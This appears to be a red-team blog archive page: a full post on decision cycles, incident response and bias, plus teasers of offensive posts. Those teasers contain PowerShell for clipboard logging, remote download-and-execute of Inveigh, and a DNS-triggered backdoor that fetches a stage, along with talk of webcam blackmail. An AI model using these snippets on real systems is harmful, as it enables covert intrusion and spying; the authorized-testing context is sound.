Common Ground Part 3: Execution and the People Factor

This is part three of a blog series titled Common Ground. In Part One, I discussed the background and evolution of red teaming, diving deep into how it applies to the information security industry and some of the limitations faced on engagements. In Part Two, I discussed various components of the planning phase that help ensure a valuable and mature exercise. In this part, I will discuss how a red team can execute a thorough operation. I will steer clear of the technical components of network red teaming and instead focus on the most important outcomes of a red team assessment: communication improvement and bias identification. I encourage you to read my disclaimer in Part One before continuing.

Decision Cycles

If you have been through any strategy classes or military training, there is a good chance you have heard of the much-used concept of decision cycles. In school, I loved the numerous military strategy and history classes I took, but at the time, I too often thought the concepts were defined to the point of absurdity (and I am sure I will get some fun comments from friends now that I am writing about them here). Later in my career, when I found myself playing adversary against major industry blue teams, I fell back on those military strategy lessons to help achieve our objective in the wargame on their network. Throughout my first several engagements, I learned that those lessons could be applied heavily toward a major goal of the assessment: improvement of process.

Decision cycles are a set of steps an entity takes repeatedly to plan a course of action, take that action, learn from the results, and implement new decisions. In theory, they are foundational to everything we do day-to-day, even if we do not realize it or formally follow one. Some formal examples:

  • Plan-Do-Check-Act – Heavily used in quality assurance
  • Observe-Orient-Decide-Act (OODA) – Used by the US military; a diagram of the process as formulated by John Boyd appears below
  • Observation–Hypothesis–Experiment–Evaluation (Scientific Method) – Used to evaluate hypotheses and make adjustments in scientific research

John Boyd, who formulated and studied the OODA cycle, also theorized about how these loops could be used to defeat an enemy. He believed that if you could work through your decision cycles faster than your adversary, you could react to events more quickly and, therefore, gain a strategic advantage. In developing this concept, he covered numerous aspects that affect the speed of decision cycles, along with methods of intentionally slowing your adversary's cycles. At each step, many factors impact the decision maker and affect the outcome.

[Figure: Boyd's OODA Loop]

Here are the phases broken down:

  • Observe: During the observe phase, the entity combines the unfolding circumstances with its current interactions in the environment to form a perception of what is happening. It enriches that perception with outside information to form the basis of its understanding.
  • Orient: During this phase, the decision maker takes their perception of the situation and aligns their thoughts with the actions that are occurring. They draw on the culture of their organization, knowledge of past events, and the constant flux of new information to begin shaping a potential decision.
  • Decide: In this phase, the decision maker weighs the output of the previous two phases and selects the best course of action.
  • Act: Having made the decision, the entity executes it and feeds any outcome back into the observe phase as part of a feedback loop, molding a changing environment.

Affecting Decisions In Each Phase – Case Study

With knowledge of this process and the goal of intentionally slowing the blue team's decision cycles, the red team can plan actions that identify not only technical vulnerabilities but human ones as well. Below are some ways the red team can alter the blue team's decision cycles. They are small examples that can be expanded greatly into a strategic playbook of sorts.

  • Observation
    • Limit the amount of information the decision maker can gain from the environment or overwhelm the decision maker with too much competing information.
    • Plant false flags pointing to multiple adversaries, producing offensive counter-information and forcing the decision maker to rely on outside information that is not actually relevant.
    • Disable network security sensors to prevent defenders from forming a perception of the environment.
  • Orient
    • Identify known personalities in the decision making process and leverage personality flaws or biases to hamper a proper decision.
    • Prevent the thorough analysis of information by shifting or changing TTPs frequently.
    • Identify cultural traditions and norms and utilize them as part of your attack path (it is normal for people to log in after hours, so log in after hours).
    • Study past breaches in the environment and identify errors that you can piggyback off of.
  • Decide
    • Adapt your TTPs rapidly so that defenders reconsider their decision numerous times, introducing delay (see the sketch after this list).
  • Act
    • Recognize when a decision has been executed and reorient yourself before their feedback loop can complete.
    • Nullify their actions in a rapid fashion so they feel the need to repeat the same actions.
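
To make the TTP-shifting idea concrete, here is a minimal PowerShell sketch of the kind of profile rotation an implant might perform. It is purely illustrative: the URIs, user agents, and intervals are made up, and a real agent would obviously do more than print its plan. The point is that each observation window presents different indicators.

```powershell
# Hypothetical C2 "profiles"; rotating them changes the observables (URI,
# user agent, timing) that defenders key their analysis on.
$profiles = @(
    @{ Uri = "/news/feed"; UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"; Interval = 60 },
    @{ Uri = "/updates/check"; UserAgent = "Microsoft-CryptoAPI/10.0"; Interval = 300 },
    @{ Uri = "/api/v2/status"; UserAgent = "curl/8.4.0"; Interval = 45 }
)

while ($true) {
    $p = Get-Random -InputObject $profiles
    # +/- 30% jitter keeps the beacon interval from repeating exactly
    $sleep = [int]($p.Interval * (Get-Random -Minimum 0.7 -Maximum 1.3))
    Write-Host "Next check-in via $($p.Uri) as $($p.UserAgent) in $sleep seconds"
    Start-Sleep -Seconds $sleep
}
```

Every rotation invalidates the picture the analysts built during the previous window, pushing them back into the observe and orient phases.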

By recognizing the “people aspect” of an engagement, the red team is better equipped to use its technical expertise to operate in the environment without drawing an effective response and, therefore, achieve success. Understanding strategy and the psychology of influence helps hammer home the impact of a blue team failing to operationally exercise its incident response plans.

Incident Response Cycle

While not technically a decision cycle, the incident response process, or “killchain,” is a cyclical process that is recognized and applied across the industry. It is defined in detail in NIST SP 800-61 R2, and NIST's figure of the process is below. As a network adversary, recognizing the process your blue team opponent is operating within allows you to better predict their actions and plot their potential steps, which decreases the time required for your decision making and increases your strategic advantage.

[Figure: IR Process, per NIST SP 800-61 R2]

Outside of the technical response conducted as part of the exercise, there is an assumed phase within each step of the process: the communications, command, and control (C3) that occurs within the organization being exercised. Within C3, significant time delays can be introduced that prevent a rapid or thorough response, essentially crippling the technical responders. The red team can exercise this process during an engagement by including the communication plans in the exercise and ensuring that the blue team conducts a complete response, just as they would against a real adversary. Common issues we see with C3 in an organization:

  • Delegation – Certain decisions must be delegated down to prevent time lag.
  • Leadership Lag – Not all non-technical leaders will understand how to respond. They need practice to react quickly during a real breach.
  • Out-of-Band C2 – Conducting response efforts over a compromised network instantly puts the adversary inside your decision cycles, watching them in real time, and allows the adversary to run deception or disruption operations.

Adversaries and red teams can also increase lag time by attacking targets that intentionally increase the amount of communication required of network defenders. By spreading laterally through multiple organizations, subsidiaries, international components, or business lines, the red team forces collaboration and response across organizational or international boundaries, which is inherently slow, if it happens at all. Testing this multinational communication also forces decision makers to consider incorporating international and privacy laws into their response plans.

With the red team targeting the human factor as well as the technical one, and with the organization working through these issues in advance, the organization will dramatically decrease the disparity between its mean time to detection and its mean time to response.


When analyzing decision cycles and incident response processes, one must recognize that bias plays a big role in sufficiently defending an organization at all levels. As a red team, recognizing the various biases that could be used as weapons against an organization can be extremely useful. As a blue team member, you must recognize that these biases exist and practice working through them.

  • Confirmation Bias – The tendency to seek information that supports your existing beliefs. Example: “I believe I have excellent egress controls, so I will look for information that shows I am successfully blocking C2.”
  • Anchoring Bias – Jumping to conclusions or basing conclusions on information gathered early in an investigation. Example: “We have the adversary contained; the email gateway shows only one user was phished.”
  • Automation Bias – Overreliance on automated systems, which skews your available information. Example: “The threat intelligence tool does not report any adversaries, so how can there be one?”
  • Framing Effect – Drawing different conclusions from the same information depending on how it is presented. Example: “The CISO presents information to the CIO in a positive, hopeful light (things are under control) because the CISO does not want to be fired, even though the breach is uncontrolled.”
  • Information Bias – The tendency to keep seeking information even when it is not needed for the decision. This is extremely common in new decision makers. Example: “The new CISO wants to continue gathering external information on the threat and consulting with outside teams before deciding on a course of action.”
  • Zero Risk Bias – Preference for reducing a small risk to zero over achieving a greater reduction in a much larger risk. Example: “Although the organization has invested $100K in phishing prevention, I want to keep driving that risk toward zero even though user home directories are completely unsecured.”

If these biases impact your organization during a red team assessment, they can be identified through a rigorous debriefing process in which both teams share journals of their activity for time comparisons. This allows the organization to improve and to recognize the risk of bias in decision making.
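
As a simple illustration of what that journal comparison can look like, here is a small PowerShell sketch; the actions and timestamps are invented for the example.

```powershell
# Red team journal: when each action actually occurred.
$redJournal = @{
    "Phish payload executed"     = [datetime]"2017-03-01 09:12"
    "Lateral move to fileserver" = [datetime]"2017-03-01 14:47"
    "Domain admin obtained"      = [datetime]"2017-03-02 10:03"
}
# Blue team journal: when (if ever) each action was detected.
$blueJournal = @{
    "Phish payload executed" = [datetime]"2017-03-01 11:30"
    "Domain admin obtained"  = [datetime]"2017-03-03 16:20"
}

foreach ($action in $redJournal.Keys) {
    if ($blueJournal.ContainsKey($action)) {
        $lag = $blueJournal[$action] - $redJournal[$action]
        "{0}: detected after {1}" -f $action, $lag
    } else {
        "{0}: never detected" -f $action
    }
}
```

Lining the journals up this way makes detection gaps and lag times, and the decisions behind them, hard to argue with during the debrief.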

For more information on cognitive bias and the impact on decision making, check out this article on MindTools. Also, this Harvard Business Review article is awesome: Why Good Leaders Make Bad Decisions.


As shown throughout this post, one major motivation for conducting a red team assessment is working through a full response and breach scenario to practice making decisions. Blue teams should recognize that their personalities are in scope, and red teams should learn to use the psychological aspects of conflict to their advantage in addition to the technical vulnerabilities they uncover. Rigorous debriefing and teamwork can benefit all stakeholders involved, allowing for a fluid and rapid response during a real breach scenario.

Blog Series Wrap Up

That wraps up my brain dump and blog series about red teaming. While these posts were not overly technical in nature, I hope the series serves people well and encourages a proactive discussion on how analytical techniques can help organizations improve, both organizationally and technically. There might be another post or two like this down the line if these were helpful, particularly on debriefing. I will state it again: any form of this analysis conducted to better the organization is useful, even if it does not fit a strict definition. As the terms have evolved, there are subsets of study and room for additional applications in the industry.

Finally, since I understand the relationship between red and blue teams can be contentious, I offer this final advice:

To the red team: you are providing a service to your customer, the blue team. You should be as familiar with defensive techniques as you are with offensive ones. Prepare well, conduct a thorough assessment, and do not get wrapped up in politics.

To the blue team: the red team is on the same team. While they may cause you more work, it is much more fun practicing response in your real environment than in a training lab. Share info and teach the red team so that they can better train you!

Common Ground: Planning is Key

This is part two of a blog series titled Common Ground. In part one, I discussed the background and evolution of red teaming, diving deep into how it applies to the information security industry and some of the limitations engagements face. In this part, I will discuss common components of red team planning and how they play into execution. There are many publications, documents, articles, and books focused on the structure of red teams, but I'm going to cover facets integral to engagement planning that I don't see discussed enough.

Planning can be completed formally or informally. Organizations often benefit from being heavily involved in the planning process; however, sometimes the task is delegated to the red team, with the organization giving final approvals. Finally, while not every component here may be thoroughly planned in every engagement, I do not believe that lessens the validity of the engagement as long as execution ties back to the central theme or motivation for testing in the first place. I encourage you to read my disclaimer in my previous piece before continuing.

References that are useful for the generic planning process of network red team engagements:

Continue reading

Common Ground Part 1: Red Team History & Overview

Over the past ten years, red teaming has grown in popularity and has been adopted across different industries as a mature method of assessing an organization's ability to handle challenges. With its widespread adoption, the term “red team” has come to mean different things to different people depending on their professional background. This is part one of a three-part blog series where I will break down and inspect red teaming. In this section, I will address what I believe red teaming is, how it applies to the infosec industry, how it differs from other technical assessments, and the realistic limitations on these types of engagements. In part two, I will discuss some topics important to planning a red team engagement, including organizational fit, threat models, training objectives, and assessment “events.” Finally, in part three, I will discuss red team execution, focusing on the human and strategic factors instead of technical aspects. That post will cover how network red teams supplement their technical testing by identifying human and procedural weaknesses, such as bias and process deficiencies inside the target's incident response cycle, from the technical responder up through the CIO.

Many thanks to my current team in ATD and those in the industry who continue to share in this discussion with me. I learn new stuff from all of you every day and I love that as a red team community, we want to continue honing our tradecraft.

Disclaimer: Before going too much further, it is obvious that this is a contentious topic. My viewpoints are derived from experience in the military planning and executing operations, followed by several years in the commercial industry helping to build and train industry-leading red teams; however, I am constantly learning and by no means think I have all of the answers. If you disagree with any points I discuss in these posts, I respect your viewpoint and the experience behind it, but we might have to agree to disagree. In the end, the importance of red teaming isn't about a single person's, or even a group's, philosophy; rather, it's about best preparing organizations to handle challenges as they arise. If your methodology suits your organization's needs, I applaud it!

Continue reading

Creepy User-Centric Post-Exploitation

I love seeing red and blue teams square off during an engagement. It works best if both sides avoid selfish desires and focus on the task at hand; improvement and training are the ultimate goal. A key component of the offensive side of this feud is the red team's ability to conduct adversarial actions against users to gather data and accomplish objectives. Throughout every engagement, the red team has to be constantly aware of user behavior: tracking their movements, exploiting their weaknesses, mapping relationships, and analyzing the yielded data to better accomplish the adversarial mission. By collecting, analyzing, and processing user-based intelligence, the red team is armed and prepared to accomplish training objectives while also carrying out realistic adversarial actions.

Keylogging, clipboard monitoring, and screenshots provide easy examples of user-centric post-exploitation actions that are both super useful for the red team and borderline creepy at times. They are also some of my favorite techniques, before and after escalation, for obtaining valuable intel. With strictly the data from these actions, our team has been able to obtain passwords to critical ICS nodes, capture screenshots of admins accessing sensitive data repositories (i.e. mainframes for healthcare, finance, etc.), retrieve router configs copied to the clipboard, and many, many more awesome things. In short, these actions are crucial for success in a large-scale, long-term engagement.
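
For illustration only, a clipboard monitor can be as simple as the following PowerShell sketch. Get-Clipboard requires PowerShell 5.0+, the log file name is arbitrary, and real tooling would keep this in memory rather than writing to disk on the target.

```powershell
# Poll the clipboard and record anything new, with a timestamp.
$last = ""
while ($true) {
    $current = Get-Clipboard -ErrorAction SilentlyContinue
    if ($current -and ($current -ne $last)) {
        "$(Get-Date -Format 'HH:mm:ss')  $current" | Out-File -Append clip_log.txt
        $last = $current
    }
    Start-Sleep -Seconds 2
}
```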

One key thing about being on a red team: you must avoid limiting yourself to certain actions or tools out of habit. You have to ditch the myopic view and broaden your horizons. When I run out of ideas, I look to the real adversaries to see what they are doing. Several sets of threat actors (i.e. Flame, Duqu) have been particularly inspiring and have driven us to “up our game” when it comes to gathering intelligence on users. These actors all appear to have a wide array of modular capabilities in their tools that allow them to accomplish required actions. For our team, Empire and Cobalt Strike have the majority of capabilities we need for data collection; however, every so often we want to dig deeper and demonstrate additional actions that an adversary could carry out. In a recent engagement, those specific actions were webcam capture and microphone audio recording.

You might ask “… REALLY? Why do I need audio/video from a target?” If you have asked that, you might consider brainstorming about all the ways an adversary gathers intel from a system or why they gather it. For example’s sake, audio capture makes a lot of sense for a military command center or political office. In a separate case, video capture of a high ranking C-level executive in their private office might result in good blackmail material for manipulation or access to sensitive discussions.

Before I go too far, I would be remiss if I didn’t mention that the Metasploit Project has post-exploitation capabilities to carry out these actions. Due to a couple of fail cases (which all tools have depending on the situation), I took it upon myself to look for or develop alternatives… Plus, I <3 Offensive/Defensive PowerShell.
Continue reading

Empire & Tool Diversity: Integration is Key

Since the release of PowerShell Empire at BSidesLV 2015 by Will Schroeder (@harmj0y) and me, the project has taken off. I could not be more proud of the community of contributors and users that has rallied together to help us maintain and continue building Empire. Since the project's release, Matt Nelson (@enigma0x3) has joined our team and has taken charge of handling the various issues that arise from time to time (many thanks to him for fighting this uphill battle). Also, Matt Graeber (@mattifestation) is now working with us and will likely have a lot of backstage influence on the continued development AND detection/mitigation of Empire. Come to think of it, I have been mostly hands-off with Empire development recently… Will and Matt work at speeds that I can only envy, and their vision for the tool is fantastic. This post continues an ongoing blog series from the Empire team and covers integration with existing toolsets, namely Metasploit and Cobalt Strike. The rest of the series, with some background and an ongoing list of posts, is kept here.

Early on, we recognized that we didn't want Empire to be an “all-purpose” agent, so we wanted to ensure that it integrated well with existing operational tools and platforms. We firmly believe there is no single, universally perfect tool; every situation demands a different perspective, and each blue team likely has different training objectives (red teams take note: they are your “customer”). With unity in mind, we focused our integration on easily passing sessions back and forth between Empire, Metasploit, and Cobalt Strike.

Continue reading

Remote Weaponization of WSUS MITM

Network attacks (WPAD injection, HTTP/WSUS MITM, SMB relay, etc.) are a very useful vector for adversaries trying to spread laterally, gather credentials, or escalate privileges in a semi-targeted manner. This vector is used by known adversaries attempting to penetrate deep into networks, and numerous threat/malware reports have cited tools with functionality that allows attackers to perform these attacks remotely. Duqu 2.0 is a great example of where such attacks can be found in the wild, and the reports on this actor make a great case study.

I became even more familiar with these techniques thanks to demos and stories from Jeff Dimmock (@bluscreenofjeff) and Andy Robbins (@_wald0), with whom I work every day. After learning Responder, I toyed with broader capabilities such as MITMf, which combines a variety of tools into a weaponized platform for easy integration into your methodology. For those unfamiliar with these tools, please check out the following links:

In the case of the evil and wily APT actors in the referenced Duqu 2.0 report, the actors used a module built specifically for their toolkit and did not require public tools or external scripts. Unfortunately, for a long period of time, public MITM/relay attack tools still required you to be physically on the local LAN (that I'm aware of, anyway… I welcome your comments). In early 2015, Kevin Robertson (@kevin_robertson) released Inveigh, a PowerShell network attack tool that uses raw sockets to implement a limited subset of techniques, including LLMNR spoofing, mDNS spoofing, and SMB relay. Inveigh opens the door for many interesting attack chains and allows us to better emulate threats that use these vectors in a remote fashion. If you care why we emulate threats, go elsewhere… Raphael Mudge has some really great ideas and thoughts on the topic.
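
To show how low the barrier to entry is, a minimal Inveigh invocation from an existing foothold might look like the following sketch. The hosting URL is a placeholder, and you should check the project's README for the parameters supported by the current version.

```powershell
# Load Inveigh into memory on the foothold (host the script wherever you
# like; this URL is illustrative), then start LLMNR/NBNS spoofing with
# real-time console output.
IEX (New-Object Net.WebClient).DownloadString("http://YOUR-HOST/Inveigh.ps1")
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y
```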

Continue reading

Derivative Local Admin


User hunting is the process of tracking down where users are logged in or have a session in the network. By locating their login or session, you might be able to gain access to that machine, escalate privileges (if required), and operate in the context of the new user. This is obviously most helpful with elevated user accounts.

Harmj0y has talked in depth about user hunting in multiple blog posts and at several different conferences… so you might wonder, why another post? While many people have paid attention and are plenty capable of running PowerView's “Invoke-UserHunter” function, they might not fully understand how it works under the hood. That gap can prevent them from being successful in “austere” networks (you know, where things get weird) or very, very large enterprise networks. Also, as people begin to lock down and follow best practices in Windows domains, I have noticed a new trend in how I am gaining access to elevated user accounts.
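
For reference, a typical invocation looks something like the sketch below, assuming PowerView is loadable from the current directory; “Domain Admins” is just the classic example target.

```powershell
# Load PowerView, then hunt for machines where Domain Admins have sessions
# and check whether the current user already has local admin on those hosts.
Import-Module .\PowerView.ps1
Invoke-UserHunter -GroupName "Domain Admins" -CheckAccess
```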

For some of the posts and presentations on user hunting, check out:

Continue reading

Domain Enumeration w/Netonly

It is common on an internal engagement for my team to be provided network access for our vulnerability scanning and penetration testing activities. One of the first things we like to do when gaining initial access to a host is use the target to conduct domain enumeration, with hopes of spreading laterally to additional systems. We have traditionally done this enumeration from a compromised host to ensure we were running in the context of a domain user. Usually we use the PowerShell functionality in Beacon or Meterpreter to run PowerView. Harmj0y has a usage guide on this functionality, and the tradecraft is far beyond the scope of this post.

Recently, with the help of Chris Truncer, I stumbled upon a method to use PowerView to enumerate the target domain directly from our team's Windows assessment VMs instead of through a compromised host. The trick I learned is quite old and has been described on pentester blogs before, but not in the context of using it for PowerView enumeration.
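
As a rough sketch of the flow (the domain and account are illustrative, and depending on your setup you may also need to point DNS at one of the target's domain controllers):

```powershell
# From a non-domain-joined assessment VM, spawn a process whose *network*
# authentication uses the target domain's credentials (a "netonly" logon).
runas /netonly /user:TARGET\jsmith powershell.exe

# Then, in the new PowerShell window, aim PowerView at the target explicitly:
Import-Module .\PowerView.ps1
Get-NetDomain -Domain target.local
Get-NetUser -Domain target.local
```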

Continue reading

PowerPick – A ClickOnce Adjunct

Phishing has always been a luck-of-the-draw situation for me on engagements. Many people say that phishing is the easiest step, and while I typically agree (since you only need one successful payload to run), I find it is one of the most common areas to tip off incident responders that a malicious campaign is occurring. On one recent engagement, phishing was quite a pain point: the users were very well trained, and the layers of defense my email had to pass through were mind-blowing. It was not long before I received notifications from Spamhaus and watched responders diving in on my initial endpoints.

Thanks to the NetSPI team, I recently discovered my new favorite phishing technique, one I wish I had used in that tough case! While playing with it, I made a slight modification that will hopefully demonstrate one of the many ways this technique can be adapted.

Continue reading

Varying Heuristics in a Network with PowerBreach

Since the dawn of hacking, many techniques have been released to backdoor Windows systems. From the wild west of the registry to the Windows Task Scheduler, hackers love finding creative ways to maintain access to their conquests. While backdoors do not have to involve malicious code, as in the case of a maliciously added user, a backdoor is often thought to be synonymous with other sub-forms of malware. It just isn't true… a backdoor can be much more interesting than a RAT hidden in the Run key. The Shmoocon 2013 talk by Jake Williams and Mark Baggett really hit home for me. The blog about this talk can be found here.

Taking a step back, let's pull straight from the most authoritative source on the internet… Wikipedia:

A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing unauthorized remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected

Across the spectrum of assessments I go on, I find the concept is not quite that simple. Backdoors possess multiple qualities that are worth breaking down to understand the decision points available to you as an operator. Further, there is no worse feeling than having your chosen backdoor become your single point of failure.
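
As one example of those qualities, here is a rough, hypothetical sketch of a resolver-style trigger in the spirit of PowerBreach: the backdoor carries no payload and generates almost no traffic until a DNS record the attacker controls changes. The domain, parked address, and staging URL are all illustrative.

```powershell
# Stay dormant until an attacker-controlled DNS name resolves to something
# other than a parked address, then pull and run a stage from that host.
$trigger = "trigger.example.com"
while ($true) {
    try {
        $ip = [System.Net.Dns]::GetHostAddresses($trigger)[0].IPAddressToString
        if ($ip -ne "127.0.0.1") {
            IEX (New-Object Net.WebClient).DownloadString("http://$ip/stage")
            break
        }
    } catch { }   # name not resolving yet; remain dormant
    Start-Sleep -Seconds 3600
}
```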

Continue reading